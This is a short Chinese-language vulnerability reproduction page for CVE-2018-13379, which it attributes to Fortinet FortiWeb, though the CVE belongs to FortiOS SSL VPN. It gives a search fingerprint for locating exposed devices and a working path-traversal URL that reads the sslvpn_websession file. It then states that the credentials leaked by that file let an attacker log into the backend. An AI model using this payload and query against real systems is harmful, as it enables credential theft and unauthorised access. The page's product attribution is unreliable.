跳转至

Fortinet FortiWeb sslvpn_websession 路径遍历漏洞 CVE-2018-13379

漏洞描述

Fortinet FortiWeb路径遍历漏洞,攻击者通过漏洞可以获取缓存信息,登录服务器

漏洞影响

Fortinet FortiWeb

网络测绘

body="FortiToken clock drift detected"

漏洞复现

登录页面

img

验证POC

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

img

获取的账号密码即可登录后台